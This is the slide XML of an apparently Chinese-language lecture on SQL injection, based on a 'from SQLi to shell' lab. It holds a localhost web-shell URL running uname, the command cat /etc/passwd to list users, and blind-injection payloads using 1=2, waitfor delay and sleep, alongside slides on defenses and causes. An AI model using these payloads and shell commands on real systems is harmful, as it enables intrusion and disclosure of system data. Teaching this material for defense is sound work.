          <a:xfrm>
            <a:off x="1156776" y="1762699"/>
            <a:ext cx="10223647" cy="4560983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开上传的图片，通过查看该页面的源代码，得到图片的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://localhost/admin/uploads/shell.php3?cmd=uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将运行在操作系统的命令信息并返回当前的内核（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到系统的完整的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取当前的内核版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321800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41554"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914399" y="1214651"/>
            <a:ext cx="10363826" cy="5063320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在服务端正式处理之前对提交数据的合法性进行检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在确认客户端的输入合法之前，服务端拒绝进行关键性的处理操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>封装客户端提交信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>替换或删除敏感字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>屏蔽出错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>屏蔽错误信息是在服务端处理完毕之后进行补救，攻击其实已经发生，只是企图阻止攻击者知道攻击的结果</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058395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拓展实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>为什么叫盲注</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与普通的注入不同的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注是一种通过向数据库请求真或假的问题然后根据回应来决定或判断答案的一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入式攻击。例如发现了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入点，但应用只提供了一个通用的错误页面，或者说提供了正常的页面，但与我们取回的内容只有细小差异（部分可能不可见或不易观察），这些就属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>盲注实质仍属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>注入，需要通过多次进行真假的询问来对内容进行逐字符的猜解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2507909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拓展实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2071171"/>
            <a:ext cx="10363826" cy="4241493"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>盲注分类</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于内容</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=2 and 1=2"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>If the content of the page that returns 'true' is different than that of the page that returns 'false', then the attacker is able to distinguish when the executed query returns true or false.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>基于时间</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxx.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> delay '00:00:10'--" (Microsoft SQL Server)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>常搭配 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>sleep()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>benchmark()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过服务器响应的时间可以判断出语句成功或失败</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2013653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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2036586"/>
            <a:ext cx="10363826" cy="3424107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pentesterlab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>course]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>pentesterlab.com/exercises/from_sqli_to_shell/course</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>. [WIKIPEDIA SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>injection]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>en.wikipedia.org/wiki/SQL_injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>百度百科 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>baike.baidu.com/view/983303.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>4. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>必应词典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://www.bing.com/knows/search?q=sql+injection&amp;mkt=zh-cn&amp;FORM=BKACAI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>各种博客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://www.myhack58.com/Article/html/3/7/2014/44097.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215882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318266"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>产生原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="1849961"/>
            <a:ext cx="10363826" cy="3424107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在应用程序链接数据库时使用权限过大的账户（例如很多开发人员都喜欢用最高权限的系统管理员账户（如常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等）连接数据库）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在数据库中开放了不必要但权力过大的功能（例如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Microsoft SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>延伸预存程序或是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OLE Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>预存程序等）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>太过于信任用户所输入的数据，未限制输入的字符数，以及未对用户输入的数据做潜在指令的检查。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307228" y="5736608"/>
            <a:ext cx="4661854" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>资料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>来源：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>维基</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
